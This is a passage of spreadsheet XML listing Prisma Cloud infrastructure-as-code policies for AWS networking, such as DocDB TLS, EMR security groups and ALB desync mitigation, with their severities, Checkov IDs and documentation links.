      </c>
      <c r="O1317" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1317" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1317" t="inlineStr"/>
      <c r="R1317" t="inlineStr"/>
      <c r="S1317" t="inlineStr"/>
      <c r="T1317" t="b">
        <v>0</v>
      </c>
      <c r="U1317" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1317" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-default-vpc</t>
        </is>
      </c>
      <c r="W1317" t="inlineStr">
        <is>
          <t>Ensure no default VPC is planned to be provisioned</t>
        </is>
      </c>
      <c r="X1317" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-no-default-vpc-is-planned-to-be-provisioned</t>
        </is>
      </c>
      <c r="Y1317" t="inlineStr"/>
      <c r="Z1317" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_default_vpc"]}</t>
        </is>
      </c>
      <c r="AA1317" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1317" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1317" t="inlineStr">
        <is>
          <t>CKV_AWS_148</t>
        </is>
      </c>
      <c r="AD1317" t="b">
        <v>1</v>
      </c>
      <c r="AE1317" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1317" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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7" t="inlineStr">
        <is>
          <t>85866910-4a92-4a99-b71c-fd309a49b3de</t>
        </is>
      </c>
      <c r="AI1317" t="inlineStr"/>
      <c r="AJ1317" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1317" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1318">
      <c r="A1318" t="inlineStr"/>
      <c r="B1318" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1318" s="2" t="inlineStr"/>
      <c r="D1318" t="inlineStr"/>
      <c r="E1318" t="inlineStr"/>
      <c r="F1318" t="inlineStr"/>
      <c r="G1318" t="b">
        <v>1</v>
      </c>
      <c r="H13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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1318" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-docdb</t>
        </is>
      </c>
      <c r="K1318" t="inlineStr">
        <is>
          <t>DocDB TLS is disabled</t>
        </is>
      </c>
      <c r="L1318" t="inlineStr"/>
      <c r="M1318" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1318" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1318" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1318" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1318" t="inlineStr"/>
      <c r="R1318" t="inlineStr"/>
      <c r="S1318" t="inlineStr"/>
      <c r="T1318" t="b">
        <v>0</v>
      </c>
      <c r="U1318" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1318" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-docdb-cluster-parameter-group</t>
        </is>
      </c>
      <c r="W1318" t="inlineStr">
        <is>
          <t>Ensure DocDB TLS is not disabled</t>
        </is>
      </c>
      <c r="X1318" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-37</t>
        </is>
      </c>
      <c r="Y1318" t="inlineStr"/>
      <c r="Z1318" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_docdb_cluster_parameter_group"]}</t>
        </is>
      </c>
      <c r="AA1318" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1318" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1318" t="inlineStr">
        <is>
          <t>CKV_AWS_90</t>
        </is>
      </c>
      <c r="AD1318" t="b">
        <v>1</v>
      </c>
      <c r="AE1318" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1318" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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8" t="inlineStr">
        <is>
          <t>a6ed2eba-5411-4c7e-9a81-0d9def87ecfe</t>
        </is>
      </c>
      <c r="AI1318" t="inlineStr"/>
      <c r="AJ1318" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1318" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1319">
      <c r="A1319" t="inlineStr"/>
      <c r="B1319" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1319" s="2" t="inlineStr"/>
      <c r="D1319" t="inlineStr"/>
      <c r="E1319" t="inlineStr"/>
      <c r="F1319" t="inlineStr"/>
      <c r="G1319" t="b">
        <v>1</v>
      </c>
      <c r="H13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19" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1319" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-eip</t>
        </is>
      </c>
      <c r="K1319" t="inlineStr">
        <is>
          <t>Not all EIP addresses allocated to a VPC are attached to EC2 instances</t>
        </is>
      </c>
      <c r="L1319" t="inlineStr"/>
      <c r="M1319" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1319" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1319" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1319" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1319" t="inlineStr"/>
      <c r="R1319" t="inlineStr"/>
      <c r="S1319" t="inlineStr"/>
      <c r="T1319" t="b">
        <v>0</v>
      </c>
      <c r="U1319" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1319" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-eip</t>
        </is>
      </c>
      <c r="W1319" t="inlineStr">
        <is>
          <t>Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances or NAT Gateways</t>
        </is>
      </c>
      <c r="X1319" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-eip-addresses-allocated-to-a-vpc-are-attached-to-ec2-instances</t>
        </is>
      </c>
      <c r="Y1319" t="inlineStr"/>
      <c r="Z1319" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_eip"]}</t>
        </is>
      </c>
      <c r="AA1319" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1319" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1319" t="inlineStr">
        <is>
          <t>CKV2_AWS_19</t>
        </is>
      </c>
      <c r="AD1319" t="b">
        <v>1</v>
      </c>
      <c r="AE1319" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1319" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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19" t="inlineStr">
        <is>
          <t>ac9f9609-d368-408a-93ba-1da69fe36380</t>
        </is>
      </c>
      <c r="AI1319" t="inlineStr"/>
      <c r="AJ1319" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1319" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1320">
      <c r="A1320" t="inlineStr"/>
      <c r="B1320" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1320" s="2" t="inlineStr"/>
      <c r="D1320" t="inlineStr"/>
      <c r="E1320" t="inlineStr"/>
      <c r="F1320" t="inlineStr"/>
      <c r="G1320" t="b">
        <v>1</v>
      </c>
      <c r="H13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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1320" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-elasticache</t>
        </is>
      </c>
      <c r="K1320" t="inlineStr">
        <is>
          <t>ElastiCache cluster is using the default subnet group</t>
        </is>
      </c>
      <c r="L1320" t="inlineStr"/>
      <c r="M1320" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1320" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1320" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1320" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1320" t="inlineStr"/>
      <c r="R1320" t="inlineStr"/>
      <c r="S1320" t="inlineStr"/>
      <c r="T1320" t="b">
        <v>0</v>
      </c>
      <c r="U1320" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1320" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-elasticache-cluster</t>
        </is>
      </c>
      <c r="W1320" t="inlineStr">
        <is>
          <t>Ensure ElastiCache clusters do not use the default subnet group</t>
        </is>
      </c>
      <c r="X1320" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-323</t>
        </is>
      </c>
      <c r="Y1320" t="inlineStr"/>
      <c r="Z1320" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_elasticache_cluster"]}</t>
        </is>
      </c>
      <c r="AA1320" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1320" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1320" t="inlineStr">
        <is>
          <t>CKV_AWS_323</t>
        </is>
      </c>
      <c r="AD1320" t="b">
        <v>1</v>
      </c>
      <c r="AE1320" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1320" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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0" t="inlineStr">
        <is>
          <t>6e3d2a38-be20-48fd-8e31-43e893e78d96</t>
        </is>
      </c>
      <c r="AI1320" t="inlineStr"/>
      <c r="AJ1320" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1320" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1321">
      <c r="A1321" t="inlineStr"/>
      <c r="B1321" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1321" s="2" t="inlineStr"/>
      <c r="D1321" t="inlineStr"/>
      <c r="E1321" t="inlineStr"/>
      <c r="F1321" t="inlineStr"/>
      <c r="G1321" t="b">
        <v>1</v>
      </c>
      <c r="H13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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1321" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-elasticache</t>
        </is>
      </c>
      <c r="K1321" t="inlineStr">
        <is>
          <t>AWS Elasticache security groups are not defined</t>
        </is>
      </c>
      <c r="L1321" t="inlineStr"/>
      <c r="M1321" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1321" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1321" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1321" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1321" t="inlineStr"/>
      <c r="R1321" t="inlineStr"/>
      <c r="S1321" t="inlineStr"/>
      <c r="T1321" t="b">
        <v>0</v>
      </c>
      <c r="U1321" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1321" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-elasticache-security-group</t>
        </is>
      </c>
      <c r="W1321" t="inlineStr">
        <is>
          <t>Ensure no aws_elasticache_security_group resources exist</t>
        </is>
      </c>
      <c r="X1321" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elasticache-security-groups-are-defined</t>
        </is>
      </c>
      <c r="Y1321" t="inlineStr"/>
      <c r="Z1321" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_elasticache_security_group"]}</t>
        </is>
      </c>
      <c r="AA1321" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1321" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1321" t="inlineStr">
        <is>
          <t>CKV_AWS_196</t>
        </is>
      </c>
      <c r="AD1321" t="b">
        <v>1</v>
      </c>
      <c r="AE1321" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1321" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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1" t="inlineStr">
        <is>
          <t>1d53320d-6dcb-4592-9025-9c17a28f13f2</t>
        </is>
      </c>
      <c r="AI1321" t="inlineStr"/>
      <c r="AJ1321" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1321" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1322">
      <c r="A1322" t="inlineStr"/>
      <c r="B1322" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1322" s="2" t="inlineStr"/>
      <c r="D1322" t="inlineStr"/>
      <c r="E1322" t="inlineStr"/>
      <c r="F1322" t="inlineStr"/>
      <c r="G1322" t="b">
        <v>1</v>
      </c>
      <c r="H13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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1322" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-elasticsearch</t>
        </is>
      </c>
      <c r="K1322" t="inlineStr">
        <is>
          <t>AWS Elasticsearch is not configured inside a VPC</t>
        </is>
      </c>
      <c r="L1322" t="inlineStr"/>
      <c r="M1322" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1322" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1322" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1322" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1322" t="inlineStr"/>
      <c r="R1322" t="inlineStr"/>
      <c r="S1322" t="inlineStr"/>
      <c r="T1322" t="b">
        <v>0</v>
      </c>
      <c r="U1322" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1322" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W1322" t="inlineStr">
        <is>
          <t>Ensure that Elasticsearch is configured inside a VPC</t>
        </is>
      </c>
      <c r="X1322" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-that-elasticsearch-is-configured-inside-a-vpc</t>
        </is>
      </c>
      <c r="Y1322" t="inlineStr"/>
      <c r="Z1322" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_elasticsearch_domain"]}</t>
        </is>
      </c>
      <c r="AA1322" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1322" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1322" t="inlineStr">
        <is>
          <t>CKV_AWS_137</t>
        </is>
      </c>
      <c r="AD1322" t="b">
        <v>1</v>
      </c>
      <c r="AE1322" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1322" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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2" t="inlineStr">
        <is>
          <t>02325f3d-6c35-4818-aa69-c09b8fb6e981</t>
        </is>
      </c>
      <c r="AI1322" t="inlineStr"/>
      <c r="AJ1322" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1322" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1323">
      <c r="A1323" t="inlineStr"/>
      <c r="B1323" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1323" s="2" t="inlineStr"/>
      <c r="D1323" t="inlineStr"/>
      <c r="E1323" t="inlineStr"/>
      <c r="F1323" t="inlineStr"/>
      <c r="G1323" t="b">
        <v>1</v>
      </c>
      <c r="H13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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1323" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-elb,aws</t>
        </is>
      </c>
      <c r="K1323" t="inlineStr">
        <is>
          <t>Auto scaling groups associated with a load balancer do not use elastic load balancing health checks</t>
        </is>
      </c>
      <c r="L1323" t="inlineStr"/>
      <c r="M1323" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1323" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1323" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1323" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1323" t="inlineStr"/>
      <c r="R1323" t="inlineStr"/>
      <c r="S1323" t="inlineStr"/>
      <c r="T1323" t="b">
        <v>0</v>
      </c>
      <c r="U1323" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1323" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-elb,aws-autoscaling-group</t>
        </is>
      </c>
      <c r="W1323" t="inlineStr">
        <is>
          <t>Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks.</t>
        </is>
      </c>
      <c r="X1323" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-that-auto-scaling-groups-that-are-associated-with-a-load-balancer-are-using-elastic-load-balancing-health-checks</t>
        </is>
      </c>
      <c r="Y1323" t="inlineStr"/>
      <c r="Z1323" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_elb","aws_autoscaling_group"]}</t>
        </is>
      </c>
      <c r="AA1323" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1323" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1323" t="inlineStr">
        <is>
          <t>CKV2_AWS_15</t>
        </is>
      </c>
      <c r="AD1323" t="b">
        <v>1</v>
      </c>
      <c r="AE1323" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1323" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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3" t="inlineStr">
        <is>
          <t>d26288c2-7208-4871-9109-fde0c6bae041</t>
        </is>
      </c>
      <c r="AI1323" t="inlineStr"/>
      <c r="AJ1323" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1323" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1324">
      <c r="A1324" t="inlineStr"/>
      <c r="B1324" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1324" s="2" t="inlineStr"/>
      <c r="D1324" t="inlineStr"/>
      <c r="E1324" t="inlineStr"/>
      <c r="F1324" t="inlineStr"/>
      <c r="G1324" t="b">
        <v>1</v>
      </c>
      <c r="H13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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1324" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-emr</t>
        </is>
      </c>
      <c r="K1324" t="inlineStr">
        <is>
          <t>Amazon EMR clusters' security groups are open to the world</t>
        </is>
      </c>
      <c r="L1324" t="inlineStr"/>
      <c r="M1324" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1324" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1324" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1324" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1324" t="inlineStr"/>
      <c r="R1324" t="inlineStr"/>
      <c r="S1324" t="inlineStr"/>
      <c r="T1324" t="b">
        <v>0</v>
      </c>
      <c r="U1324" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1324" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-emr-cluster,aws-security-group</t>
        </is>
      </c>
      <c r="W1324" t="inlineStr">
        <is>
          <t>Ensure that Amazon EMR clusters' security groups are not open to the world</t>
        </is>
      </c>
      <c r="X1324" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-that-amazon-emr-clusters-security-groups-are-not-open-to-the-world</t>
        </is>
      </c>
      <c r="Y1324" t="inlineStr"/>
      <c r="Z1324" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_emr_cluster","aws_security_group"]}</t>
        </is>
      </c>
      <c r="AA1324" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1324" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1324" t="inlineStr">
        <is>
          <t>CKV2_AWS_7</t>
        </is>
      </c>
      <c r="AD1324" t="b">
        <v>1</v>
      </c>
      <c r="AE1324" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1324" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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4" t="inlineStr">
        <is>
          <t>c1298129-c701-4548-8395-34043b3e0be5</t>
        </is>
      </c>
      <c r="AI1324" t="inlineStr"/>
      <c r="AJ1324" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1324" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1325">
      <c r="A1325" t="inlineStr"/>
      <c r="B1325" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1325" s="2" t="inlineStr"/>
      <c r="D1325" t="inlineStr"/>
      <c r="E1325" t="inlineStr"/>
      <c r="F1325" t="inlineStr"/>
      <c r="G1325" t="b">
        <v>1</v>
      </c>
      <c r="H13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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1325" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-lb</t>
        </is>
      </c>
      <c r="K1325" t="inlineStr">
        <is>
          <t>ALB does not drop HTTP headers</t>
        </is>
      </c>
      <c r="L1325" t="inlineStr"/>
      <c r="M1325" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1325" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1325" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1325" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1325" t="inlineStr"/>
      <c r="R1325" t="inlineStr"/>
      <c r="S1325" t="inlineStr"/>
      <c r="T1325" t="b">
        <v>0</v>
      </c>
      <c r="U1325" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1325" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-lb</t>
        </is>
      </c>
      <c r="W1325" t="inlineStr">
        <is>
          <t>Ensure that ALB drops HTTP headers</t>
        </is>
      </c>
      <c r="X1325" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-that-alb-drops-http-headers</t>
        </is>
      </c>
      <c r="Y1325" t="inlineStr"/>
      <c r="Z1325" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_lb"]}</t>
        </is>
      </c>
      <c r="AA1325" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1325" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1325" t="inlineStr">
        <is>
          <t>CKV_AWS_131</t>
        </is>
      </c>
      <c r="AD1325" t="b">
        <v>1</v>
      </c>
      <c r="AE1325" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1325" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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5" t="inlineStr">
        <is>
          <t>5dd236e7-f0da-4a06-825d-7691cdbf10be</t>
        </is>
      </c>
      <c r="AI1325" t="inlineStr"/>
      <c r="AJ1325" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1325" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1326">
      <c r="A1326" t="inlineStr"/>
      <c r="B1326" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1326" s="2" t="inlineStr"/>
      <c r="D1326" t="inlineStr"/>
      <c r="E1326" t="inlineStr"/>
      <c r="F1326" t="inlineStr"/>
      <c r="G1326" t="b">
        <v>1</v>
      </c>
      <c r="H13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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1326" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-lb,aws</t>
        </is>
      </c>
      <c r="K1326" t="inlineStr">
        <is>
          <t>ALB is not configured with the defensive or strictest desync mitigation mode</t>
        </is>
      </c>
      <c r="L1326" t="inlineStr"/>
      <c r="M1326" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1326" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1326" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1326" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1326" t="inlineStr"/>
      <c r="R1326" t="inlineStr"/>
      <c r="S1326" t="inlineStr"/>
      <c r="T1326" t="b">
        <v>0</v>
      </c>
      <c r="U1326" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1326" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-lb,aws-alb,aws-elb</t>
        </is>
      </c>
      <c r="W1326" t="inlineStr">
        <is>
          <t>Ensure that ALB is configured with defensive or strictest desync mitigation mode</t>
        </is>
      </c>
      <c r="X1326" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-328</t>
        </is>
      </c>
      <c r="Y1326" t="inlineStr"/>
      <c r="Z1326" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_lb","aws_alb","aws_elb"]}</t>
        </is>
      </c>
      <c r="AA1326" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1326" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1326" t="inlineStr">
        <is>
          <t>CKV_AWS_328</t>
        </is>
      </c>
      <c r="AD1326" t="b">
        <v>1</v>
      </c>
      <c r="AE1326" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1326" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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6" t="inlineStr">
        <is>
          <t>4f1cefe2-1d41-49d6-895b-edacb4fbcf54</t>
        </is>
      </c>
      <c r="AI1326" t="inlineStr"/>
      <c r="AJ1326" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1326" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1327">
      <c r="A1327" t="inlineStr"/>
      <c r="B1327" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1327" s="2" t="inlineStr"/>
      <c r="D1327" t="inlineStr"/>
      <c r="E1327" t="inlineStr"/>
      <c r="F1327" t="inlineStr"/>
      <c r="G1327" t="b">
        <v>1</v>
      </c>
      <c r="H13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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1327" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-lb,aws</t>
        </is>
      </c>
      <c r="K1327" t="inlineStr">
        <is>
          <t>ALB does not redirect HTTP requests into HTTPS ones</t>
        </is>
      </c>
      <c r="L1327" t="inlineStr"/>
      <c r="M1327" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1327" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1327" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1327" t="inlineStr">
        <is>
